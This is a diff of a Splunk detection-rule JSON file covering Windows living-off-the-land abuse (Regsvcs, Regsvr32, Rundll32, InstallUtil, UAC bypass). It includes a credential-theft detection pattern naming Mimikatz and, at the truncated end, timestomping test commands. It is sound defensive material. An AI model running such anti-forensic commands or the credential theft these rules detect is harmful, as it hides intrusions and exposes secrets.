"APT19", - "APT32", - "Blue Mockingbird", - "Cobalt Group", - "Deep Panda", - "Inception", - "Kimsuky", - "Leviathan", - "TA551", - "WIRTE" - ] + "mitre_attack_groups": [] } ] } }, { - "name": "Detect Rundll32 Application Control Bypass - advpack", - "description": "The following analytic identifies rundll32.exe loading advpack.dll and ieadvpack.dll by calling the LaunchINFSection function on the command line. This particular technique will load script code from a file. Upon a successful execution, the following module loads may occur - clr.dll, jscript.dll and scrobj.dll. During investigation, identify script content origination. Generally, a child process will spawn from rundll32.exe, but that may be bypassed based on script code contents. Rundll32.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64. During investigation, review any network connections and obtain the script content executed. It's possible other files are on disk.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_rundll32` Processes.process=*advpack* by Processes.dest Processes.user Processes.parent_process_name Processes.original_file_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_rundll32_application_control_bypass___advpack_filter`", + "name": "Detect Regsvcs Spawning a Process", + "description": "The following analytic identifies regsvcs.exe spawning a process. This particular technique has been used in the wild to bypass application control products. Regasm.exe and Regsvcs.exe are signed by Microsoft. Spawning of a child process is rare from either process and should be investigated further. During investigation, identify and retrieve the content being loaded. Review parallel processes for additional suspicious behavior. Gather any other file modifications and review accordingly. regsvcs.exe and regasm.exe are natively found in C:\\Windows\\Microsoft.NET\\Framework\\v*\\regasm|regsvcs.exe and C:\\Windows\\Microsoft.NET\\Framework64\\v*\\regasm|regsvcs.exe.", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=regsvcs.exe by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_regsvcs_spawning_a_process_filter`", "tags": { - "name": "Detect Rundll32 Application Control Bypass - advpack", + "name": "Detect Regsvcs Spawning a Process", "analytic_story": [ - "Suspicious Rundll32 Activity", + "Suspicious Regsvcs Regasm Activity", "Living Off The Land" ], "asset_type": "Endpoint", @@ -273785,10 +276220,10 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "An instance of $parent_process_name$ spawning $process_name$ loading advpack.dll and ieadvpack.dll by calling the LaunchINFSection function on the command line was identified on endpoint $dest$ by user $user$.", + "message": "An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ typically not normal for this process.", "mitre_attack_id": [ "T1218", - "T1218.011" + "T1218.009" ], "nist": [ "DE.CM" @@ -273802,7 +276237,334 @@ ] }, { - "name": "Computer", + "name": "dest", + "type": "Hostname", + "role": [ + "Victim" + ] + }, + { + "name": "parent_process_name", + "type": "Process", + "role": [ + "Parent Process" + ] + }, + { + "name": "process_name", + "type": "Process", + "role": [ + "Child Process" + ] + } + ], + "risk_score": 64, + "security_domain": "endpoint", + "risk_severity": "medium", + "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1218", + "mitre_attack_technique": "System Binary Proxy Execution", + "mitre_attack_tactics": [ + "Defense Evasion" + ], + "mitre_attack_groups": [ + "Lazarus Group" + ] + }, + { + "mitre_attack_id": "T1218.009", + "mitre_attack_technique": "Regsvcs/Regasm", + "mitre_attack_tactics": [ + "Defense Evasion" + ], + "mitre_attack_groups": [] + } + ] + } + }, + { + "name": "Detect Regsvcs with Network Connection", + "description": "The following analytic identifies Regsvcs.exe with a network connection to a public IP address, exluding private IP space. This particular technique has been used in the wild to bypass application control products. Regasm.exe and Regsvcs.exe are signed by Microsoft. By contacting a remote Command And Control server, the adversary will have the ability to escalate privileges and complete the objectives. During investigation, identify and retrieve the content being loaded. Review parallel processes for additional suspicious behavior. Gather any other file modifications and review accordingly. Review the reputation of the remote IP or domain and block as needed. regsvcs.exe and regasm.exe are natively found in C:\\Windows\\Microsoft.NET\\Framework\\v*\\regasm|regsvcs.exe and C:\\Windows\\Microsoft.NET\\Framework64\\v*\\regasm|regsvcs.exe.", + "search": "`sysmon` EventID=3 dest_ip!=10.0.0.0/12 dest_ip!=172.16.0.0/12 dest_ip!=192.168.0.0/16 process_name=regsvcs.exe | rename Computer as dest | stats count min(_time) as firstTime max(_time) as lastTime by dest, user, process_name, src_ip, dest_ip | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_regsvcs_with_network_connection_filter`", + "tags": { + "name": "Detect Regsvcs with Network Connection", + "analytic_story": [ + "Suspicious Regsvcs Regasm Activity", + "Living Off The Land" + ], + "asset_type": "Endpoint", + "cis20": [ + "CIS 10" + ], + "kill_chain_phases": [ + "Exploitation" + ], + "message": "An instance of $process_name$ contacting a remote destination was identified on endpoint $Computer$ by user $user$. This behavior is not normal for $process_name$.", + "mitre_attack_id": [ + "T1218", + "T1218.009" + ], + "nist": [ + "DE.CM" + ], + "observable": [ + { + "name": "user", + "type": "User", + "role": [ + "Victim" + ] + }, + { + "name": "dest", + "type": "Hostname", + "role": [ + "Victim" + ] + }, + { + "name": "process_name", + "type": "Process", + "role": [ + "Child Process" + ] + } + ], + "risk_score": 80, + "security_domain": "Endpoint", + "risk_severity": "high", + "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1218", + "mitre_attack_technique": "System Binary Proxy Execution", + "mitre_attack_tactics": [ + "Defense Evasion" + ], + "mitre_attack_groups": [ + "Lazarus Group" + ] + }, + { + "mitre_attack_id": "T1218.009", + "mitre_attack_technique": "Regsvcs/Regasm", + "mitre_attack_tactics": [ + "Defense Evasion" + ], + "mitre_attack_groups": [] + } + ] + } + }, + { + "name": "Detect Regsvcs with No Command Line Arguments", + "description": "The following analytic identifies regsvcs.exe with no command line arguments. This particular behavior occurs when another process injects into regsvcs.exe, no command line arguments will be present. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Regasm.exe are natively found in C:\\Windows\\Microsoft.NET\\Framework\\v*\\regasm|regsvcs.exe and C:\\Windows\\Microsoft.NET\\Framework64\\v*\\regasm|regsvcs.exe.", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where `process_regsvcs` by _time span=1h Processes.process_id Processes.process_name Processes.dest Processes.user Processes.process_path Processes.process Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | regex process=\"(?i)(regsvcs\\.exe.{0,4}$)\"| `detect_regsvcs_with_no_command_line_arguments_filter`", + "tags": { + "name": "Detect Regsvcs with No Command Line Arguments", + "analytic_story": [ + "Suspicious Regsvcs Regasm Activity", + "Living Off The Land" + ], + "asset_type": "Endpoint", + "cis20": [ + "CIS 10" + ], + "kill_chain_phases": [ + "Exploitation" + ], + "message": "The process $process_name$ was spawned by $parent_process_name$ without any command-line arguments on $dest$ by $user$.", + "mitre_attack_id": [ + "T1218", + "T1218.009" + ], + "nist": [ + "DE.CM" + ], + "observable": [ + { + "name": "user", + "type": "User", + "role": [ + "Victim" + ] + }, + { + "name": "dest", + "type": "Hostname", + "role": [ + "Victim" + ] + }, + { + "name": "parent_process_name", + "type": "Process", + "role": [ + "Parent Process" + ] + }, + { + "name": "process_name", + "type": "Process", + "role": [ + "Child Process" + ] + } + ], + "risk_score": 49, + "security_domain": "endpoint", + "risk_severity": "low", + "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1218", + "mitre_attack_technique": "System Binary Proxy Execution", + "mitre_attack_tactics": [ + "Defense Evasion" + ], + "mitre_attack_groups": [ + "Lazarus Group" + ] + }, + { + "mitre_attack_id": "T1218.009", + "mitre_attack_technique": "Regsvcs/Regasm", + "mitre_attack_tactics": [ + "Defense Evasion" + ], + "mitre_attack_groups": [] + } + ] + } + }, + { + "name": "Detect Regsvr32 Application Control Bypass", + "description": "Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.This variation of the technique is often referred to as a \"Squiblydoo\" attack. \\\nUpon investigating, look for network connections to remote destinations (internal or external). Be cautious to modify the query to look for \"scrobj.dll\", the \".dll\" is not required to load scrobj. \"scrobj.dll\" will be loaded by \"regsvr32.exe\" upon execution. ", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_regsvr32` Processes.process=*scrobj* by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.parent_process_name Processes.process Processes.original_file_name Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `detect_regsvr32_application_control_bypass_filter`", + "tags": { + "name": "Detect Regsvr32 Application Control Bypass", + "analytic_story": [ + "Living Off The Land", + "Cobalt Strike", + "BlackByte Ransomware", + "Graceful Wipe Out Attack", + "Suspicious Regsvr32 Activity" + ], + "asset_type": "Endpoint", + "cis20": [ + "CIS 10" + ], + "kill_chain_phases": [ + "Exploitation" + ], + "message": "An instance of $parent_process_name$ spawning $process_name$ in an attempt to bypass detection and preventative controls was identified on endpoint $dest$ by user $user$.", + "mitre_attack_id": [ + "T1218", + "T1218.010" + ], + "nist": [ + "DE.CM" + ], + "observable": [ + { + "name": "user", + "type": "User", + "role": [ + "Victim" + ] + }, + { + "name": "dest", + "type": "Hostname", + "role": [ + "Victim" + ] + }, + { + "name": "parent_process_name", + "type": "Process", + "role": [ + "Parent Process" + ] + }, + { + "name": "process_name", + "type": "Process", + "role": [ + "Child Process" + ] + } + ], + "risk_score": 80, + "security_domain": "endpoint", + "risk_severity": "high", + "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1218", + "mitre_attack_technique": "System Binary Proxy Execution", + "mitre_attack_tactics": [ + "Defense Evasion" + ], + "mitre_attack_groups": [ + "Lazarus Group" + ] + }, + { + "mitre_attack_id": "T1218.010", + "mitre_attack_technique": "Regsvr32", + "mitre_attack_tactics": [ + "Defense Evasion" + ], + "mitre_attack_groups": [ + "APT19", + "APT32", + "Blue Mockingbird", + "Cobalt Group", + "Deep Panda", + "Inception", + "Kimsuky", + "Leviathan", + "TA551", + "WIRTE" + ] + } + ] + } + }, + { + "name": "Detect Rundll32 Application Control Bypass - advpack", + "description": "The following analytic identifies rundll32.exe loading advpack.dll and ieadvpack.dll by calling the LaunchINFSection function on the command line. This particular technique will load script code from a file. Upon a successful execution, the following module loads may occur - clr.dll, jscript.dll and scrobj.dll. During investigation, identify script content origination. Generally, a child process will spawn from rundll32.exe, but that may be bypassed based on script code contents. Rundll32.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64. During investigation, review any network connections and obtain the script content executed. It's possible other files are on disk.", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_rundll32` Processes.process=*advpack* by Processes.dest Processes.user Processes.parent_process_name Processes.original_file_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_rundll32_application_control_bypass___advpack_filter`", + "tags": { + "name": "Detect Rundll32 Application Control Bypass - advpack", + "analytic_story": [ + "Suspicious Rundll32 Activity", + "Living Off The Land" + ], + "asset_type": "Endpoint", + "cis20": [ + "CIS 10" + ], + "kill_chain_phases": [ + "Exploitation" + ], + "message": "An instance of $parent_process_name$ spawning $process_name$ loading advpack.dll and ieadvpack.dll by calling the LaunchINFSection function on the command line was identified on endpoint $dest$ by user $user$.", + "mitre_attack_id": [ + "T1218", + "T1218.011" + ], + "nist": [ + "DE.CM" + ], + "observable": [ + { + "name": "user", + "type": "User", + "role": [ + "Victim" + ] + }, + { + "name": "dest", "type": "Hostname", "role": [ "Victim" @@ -273902,7 +276664,7 @@ ] }, { - "name": "Computer", + "name": "dest", "type": "Hostname", "role": [ "Victim" @@ -274002,7 +276764,7 @@ ] }, { - "name": "Computer", + "name": "dest", "type": "Hostname", "role": [ "Victim" @@ -274872,7 +277634,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "process $process_name$ with cmdline $process$ in host $dest$", + "message": "Process $process_name$ with cmdline $process$ in host $dest$", "mitre_attack_id": [ "T1218", "T1218.011" @@ -274889,7 +277651,7 @@ ] }, { - "name": "SourceImage", + "name": "process_name", "type": "Process Name", "role": [ "Attacker" @@ -275457,7 +278219,7 @@ { "name": "Suspicious Regsvr32 Register Suspicious Path", "description": "Adversaries may abuse Regsvr32.exe to proxy execution of malicious code by using non-standard file extensions to load DLLs. Upon investigating, look for network connections to remote destinations (internal or external). Review additional parrallel processes and child processes for additional activity.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_regsvr32` Processes.process IN (\"*\\\\appdata\\\\*\", \"*\\\\programdata\\\\*\",\"*\\\\windows\\\\temp\\\\*\") NOT (Processes.process IN (\"*.dll*\", \"*.ax*\", \"*.ocx*\")) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.original_file_name Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `suspicious_regsvr32_register_suspicious_path_filter`", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_regsvr32` Processes.process IN (\"*\\\\appdata\\\\*\", \"*\\\\programdata\\\\*\",\"*\\\\windows\\\\temp\\\\*\") NOT (Processes.process IN (\"*.dll*\", \"*.ax*\", \"*.ocx*\")) by Processes.dest Processes.user Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process Processes.original_file_name Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `suspicious_regsvr32_register_suspicious_path_filter`", "tags": { "name": "Suspicious Regsvr32 Register Suspicious Path", "analytic_story": [ @@ -275550,7 +278312,7 @@ { "name": "Suspicious Rundll32 dllregisterserver", "description": "The following analytic identifies rundll32.exe using dllregisterserver on the command line to load a DLL. When a DLL is registered, the DllRegisterServer method entry point in the DLL is invoked. This is typically seen when a DLL is being registered on the system. Not every instance is considered malicious, but it will capture malicious use of it. During investigation, review the parent process and parrellel processes executing. Capture the DLL being loaded and inspect further. Rundll32.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_rundll32` Processes.process=*dllregisterserver* by Processes.dest Processes.user Processes.parent_process Processes.original_file_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `suspicious_rundll32_dllregisterserver_filter`", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_rundll32` Processes.process=*dllregisterserver* by Processes.dest Processes.user Processes.parent_process_name Processes.parent_process Processes.original_file_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `suspicious_rundll32_dllregisterserver_filter`", "tags": { "name": "Suspicious Rundll32 dllregisterserver", "analytic_story": [ @@ -275651,7 +278413,7 @@ { "name": "Suspicious Rundll32 no Command Line Arguments", "description": "The following analytic identifies rundll32.exe with no command line arguments. It is unusual for rundll32.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Rundll32.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where `process_rundll32` by _time span=1h Processes.process_id Processes.process_name Processes.dest Processes.process_path Processes.process Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | regex process=\"(?i)(rundll32\\.exe.{0,4}$)\" | `suspicious_rundll32_no_command_line_arguments_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where `process_rundll32` by _time span=1h Processes.process_id Processes.process_name Processes.dest Processes.user Processes.process_path Processes.process Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | regex process=\"(?i)(rundll32\\.exe.{0,4}$)\" | `suspicious_rundll32_no_command_line_arguments_filter`", "tags": { "name": "Suspicious Rundll32 no Command Line Arguments", "analytic_story": [ @@ -275685,7 +278447,7 @@ ] }, { - "name": "User", + "name": "user", "type": "User", "role": [ "Victim" @@ -275842,7 +278604,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "rundll32.exe running with suspicious parameters on $dest$", + "message": "rundll32.exe running with suspicious StartW parameters on $dest$", "mitre_attack_id": [ "T1218", "T1218.011" @@ -275859,7 +278621,7 @@ ] }, { - "name": "User", + "name": "user", "type": "User", "role": [ "Victim" @@ -275914,7 +278676,7 @@ { "name": "UAC Bypass With Colorui COM Object", "description": "This search is to detect a possible uac bypass using the colorui.dll COM Object. this technique was seen in so many malware and ransomware like lockbit where it make use of the colorui.dll COM CLSID to bypass UAC.", - "search": "`sysmon` EventCode=7 ImageLoaded=\"*\\\\colorui.dll\" process_name != \"colorcpl.exe\" NOT(Image IN(\"*\\\\windows\\\\*\", \"*\\\\program files*\")) | stats count min(_time) as firstTime max(_time) as lastTime by Image ImageLoaded process_name Computer EventCode Signed ProcessId | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `uac_bypass_with_colorui_com_object_filter`", + "search": "`sysmon` EventCode=7 ImageLoaded=\"*\\\\colorui.dll\" process_name != \"colorcpl.exe\" NOT(Image IN(\"*\\\\windows\\\\*\", \"*\\\\program files*\")) | stats count min(_time) as firstTime max(_time) as lastTime by dest parent_process_name process_name ImageLoaded signature_id signature Signed user_id | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `uac_bypass_with_colorui_com_object_filter`", "tags": { "name": "UAC Bypass With Colorui COM Object", "analytic_story": [ @@ -275928,7 +278690,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "The following module $ImageLoaded$ was loaded by a non-standard application on endpoint $Computer$ by user $user$.", + "message": "The following module $ImageLoaded$ was loaded by a non-standard application $parent_process_name$ on endpoint $dest$ by user $user_id$.", "mitre_attack_id": [ "T1218", "T1218.003" @@ -275938,14 +278700,7 @@ ], "observable": [ { - "name": "user", - "type": "User", - "role": [ - "Victim" - ] - }, - { - "name": "Computer", + "name": "dest", "type": "Hostname", "role": [ "Victim" @@ -276317,7 +279072,7 @@ { "name": "Windows DotNet Binary in Non Standard Path", "description": "The following analytic identifies native .net binaries within the Windows operating system that may be abused by adversaries by moving it to a new directory. The analytic identifies the .net binary by using a lookup and compares the process name and original file name (internal name). The analytic utilizes a lookup with the is_net_windows_file macro to identify the binary process name and original file name. if one or the other matches an alert will be generated. Adversaries abuse these binaries as they are native to windows and native DotNet. Note that not all SDK (post install of Windows) are captured in the lookup.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Processes where NOT (Processes.process_path IN (\"*\\\\Windows\\\\ADWS\\\\*\",\"*\\\\Windows\\\\SysWOW64*\", \"*\\\\Windows\\\\system32*\", \"*\\\\Windows\\\\NetworkController\\\\*\", \"*\\\\Windows\\\\SystemApps\\\\*\", \"*\\\\WinSxS\\\\*\", \"*\\\\Windows\\\\Microsoft.NET\\\\*\")) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.original_file_name Processes.process_path Processes.process_id Processes.parent_process_id | `drop_dm_object_name(\"Processes\")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `is_net_windows_file` | `windows_dotnet_binary_in_non_standard_path_filter`", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Processes where NOT (Processes.process_path IN (\"*\\\\Windows\\\\ADWS\\\\*\",\"*\\\\Windows\\\\SysWOW64*\", \"*\\\\Windows\\\\system32*\", \"*\\\\Windows\\\\NetworkController\\\\*\", \"*\\\\Windows\\\\SystemApps\\\\*\", \"*\\\\WinSxS\\\\*\", \"*\\\\Windows\\\\Microsoft.NET\\\\*\")) by Processes.dest Processes.user Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process Processes.original_file_name Processes.process_path Processes.process_id Processes.parent_process_id | `drop_dm_object_name(\"Processes\")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `is_net_windows_file` | `windows_dotnet_binary_in_non_standard_path_filter`", "tags": { "name": "Windows DotNet Binary in Non Standard Path", "analytic_story": [ @@ -276512,7 +279267,7 @@ { "name": "Windows InstallUtil Credential Theft", "description": "The following analytic identifies the Windows InstallUtil.exe binary loading `vaultcli.dll` and Samlib.dll`. This technique may be used to execute code to bypassing application control and capture credentials by utilizing a tool like MimiKatz. \\\nWhen `InstallUtil.exe` is used in a malicous manner, the path to an executable on the filesystem is typically specified. Take note of the parent process. In a suspicious instance, this will be spawned from a non-standard process like `Cmd.exe`, `PowerShell.exe` or `Explorer.exe`. \\\nIf used by a developer, typically this will be found with multiple command-line switches/arguments and spawn from Visual Studio. \\\nDuring triage review resulting network connections, file modifications, and parallel processes. Capture any artifacts and review further.", - "search": "`sysmon` EventCode=7 parent_process_name=installutil.exe ImageLoaded IN (\"*\\\\samlib.dll\", \"*\\\\vaultcli.dll\") | stats count min(_time) as firstTime max(_time) as lastTime by Computer, parent_process_name, ImageLoaded, OriginalFileName, ProcessId | rename Computer as dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_installutil_credential_theft_filter`", + "search": "`sysmon` EventCode=7 parent_process_name=installutil.exe ImageLoaded IN (\"*\\\\samlib.dll\", \"*\\\\vaultcli.dll\") | stats count min(_time) as firstTime max(_time) as lastTime by dest, parent_process_name, ImageLoaded, OriginalFileName, ProcessId | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_installutil_credential_theft_filter`", "tags": { "name": "Windows InstallUtil Credential Theft", "analytic_story": [ @@ -276525,7 +279280,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ loading samlib.dll and vaultcli.dll to potentially capture credentials in memory.", + "message": "An instance of $parent_process_name$ spawning $ImageLoaded$ was identified on endpoint $dest$ loading samlib.dll and vaultcli.dll to potentially capture credentials in memory.", "mitre_attack_id": [ "T1218.004", "T1218" @@ -276534,13 +279289,6 @@ "DE.CM" ], "observable": [ - { - "name": "user", - "type": "User", - "role": [ - "Victim" - ] - }, { "name": "dest", "type": "Hostname", @@ -276554,13 +279302,6 @@ "role": [ "Parent Process" ] - }, - { - "name": "process_name", - "type": "Process", - "role": [ - "Child Process" - ] } ], "risk_score": 80, @@ -276594,7 +279335,7 @@ { "name": "Windows InstallUtil in Non Standard Path", "description": "The following analytic identifies the Windows binary InstallUtil.exe running from a non-standard location. The analytic utilizes a macro for InstallUtil and identifies both the process_name and original_file_name.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Processes where `process_installutil` NOT (Processes.process_path IN (\"*\\\\Windows\\\\ADWS\\\\*\",\"*\\\\Windows\\\\SysWOW64*\", \"*\\\\Windows\\\\system32*\", \"*\\\\Windows\\\\NetworkController\\\\*\", \"*\\\\Windows\\\\SystemApps\\\\*\", \"*\\\\WinSxS\\\\*\", \"*\\\\Windows\\\\Microsoft.NET\\\\*\")) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.original_file_name Processes.process_id Processes.parent_process_id Processes.process_hash | `drop_dm_object_name(\"Processes\")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_installutil_in_non_standard_path_filter`", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Processes where `process_installutil` NOT (Processes.process_path IN (\"*\\\\Windows\\\\ADWS\\\\*\",\"*\\\\Windows\\\\SysWOW64*\", \"*\\\\Windows\\\\system32*\", \"*\\\\Windows\\\\NetworkController\\\\*\", \"*\\\\Windows\\\\SystemApps\\\\*\", \"*\\\\WinSxS\\\\*\", \"*\\\\Windows\\\\Microsoft.NET\\\\*\")) by Processes.dest Processes.user Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process Processes.original_file_name Processes.process_id Processes.parent_process_id Processes.process_hash | `drop_dm_object_name(\"Processes\")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_installutil_in_non_standard_path_filter`", "tags": { "name": "Windows InstallUtil in Non Standard Path", "analytic_story": [ @@ -276720,7 +279461,7 @@ { "name": "Windows InstallUtil Remote Network Connection", "description": "The following analytic identifies the Windows InstallUtil.exe binary making a remote network connection. This technique may be used to download and execute code while bypassing application control. \\\nWhen `InstallUtil.exe` is used in a malicous manner, the path to an executable on the filesystem is typically specified. Take note of the parent process. In a suspicious instance, this will be spawned from a non-standard process like `Cmd.exe`, `PowerShell.exe` or `Explorer.exe`. \\\nIf used by a developer, typically this will be found with multiple command-line switches/arguments and spawn from Visual Studio. \\\nDuring triage review resulting network connections, file modifications, and parallel processes. Capture any artifacts and review further.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where `process_installutil` by _time span=1h Processes.process_id Processes.process_name Processes.dest Processes.process_path Processes.process Processes.parent_process_name Processes.original_file_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | join process_id [| tstats `security_content_summariesonly` count FROM datamodel=Network_Traffic.All_Traffic where All_Traffic.dest_port != 0 by All_Traffic.process_id All_Traffic.dest All_Traffic.dest_port | `drop_dm_object_name(All_Traffic)` | rename dest as C2 ] | table _time dest parent_process_name process_name process_path process process_id dest_port C2 | `windows_installutil_remote_network_connection_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where `process_installutil` by _time span=1h Processes.process_id Processes.process_name Processes.dest Processes.process_path Processes.process Processes.parent_process_name Processes.original_file_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | join process_id [| tstats `security_content_summariesonly` count FROM datamodel=Network_Traffic.All_Traffic where All_Traffic.dest_port != 0 by All_Traffic.process_id All_Traffic.dest All_Traffic.dest_port | `drop_dm_object_name(All_Traffic)` | rename dest as C2 ] | table _time user dest parent_process_name process_name process_path process process_id dest_port C2 | `windows_installutil_remote_network_connection_filter`", "tags": { "name": "Windows InstallUtil Remote Network Connection", "analytic_story": [ @@ -276886,7 +279627,7 @@ { "name": "Windows InstallUtil Uninstall Option with Network", "description": "The following analytic identifies the Windows InstallUtil.exe binary making a remote network connection. This technique may be used to download and execute code while bypassing application control using the `/u` (uninstall) switch. \\\nInstallUtil uses the functions install and uninstall within the System.Configuration.Install namespace to process .net assembly. Install function requires admin privileges, however, uninstall function can be run as an unprivileged user.\\\nWhen `InstallUtil.exe` is used in a malicous manner, the path to an executable on the filesystem is typically specified. Take note of the parent process. In a suspicious instance, this will be spawned from a non-standard process like `Cmd.exe`, `PowerShell.exe` or `Explorer.exe`. \\\nIf used by a developer, typically this will be found with multiple command-line switches/arguments and spawn from Visual Studio. \\\nDuring triage review resulting network connections, file modifications, and parallel processes. Capture any artifacts and review further.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where `process_installutil` Processes.process IN (\"*/u*\", \"*uninstall*\") by _time span=1h Processes.process_id Processes.process_name Processes.dest Processes.process_path Processes.process Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | join process_id [| tstats `security_content_summariesonly` count FROM datamodel=Network_Traffic.All_Traffic where All_Traffic.dest_port != 0 by All_Traffic.process_id All_Traffic.dest All_Traffic.dest_port | `drop_dm_object_name(All_Traffic)` | rename dest as C2 ] | table _time dest parent_process_name process_name process_path process process_id dest_port C2 | `windows_installutil_uninstall_option_with_network_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where `process_installutil` Processes.process IN (\"*/u*\", \"*uninstall*\") by _time span=1h Processes.user Processes.process_id Processes.process_name Processes.dest Processes.process_path Processes.process Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | join process_id [| tstats `security_content_summariesonly` count FROM datamodel=Network_Traffic.All_Traffic where All_Traffic.dest_port != 0 by All_Traffic.process_id All_Traffic.dest All_Traffic.dest_port | `drop_dm_object_name(All_Traffic)` | rename dest as C2 ] | table _time user dest parent_process_name process_name process_path process process_id dest_port C2 | `windows_installutil_uninstall_option_with_network_filter`", "tags": { "name": "Windows InstallUtil Uninstall Option with Network", "analytic_story": [ @@ -278434,9 +281175,9 @@ "touch -m -t 197001010000.00 /tmp/T1070.006-modification.txt\n", "NOW=$(date +%m%d%H%M%Y)\ndate 010100001971\ntouch /tmp/T1070.006-creation.txt\ndate \"$NOW\"\nstat /tmp/T1070.006-creation.txt\n", "touch -acmr /bin/sh /tmp/T1070.006-reference.txt\n", - "Get-ChildItem \\..\\ExternalPayloads\\T1551.006_timestomp.txt | % { $_.CreationTime = \"01/01/1970 00:00:00\" }\n", - "Get-ChildItem 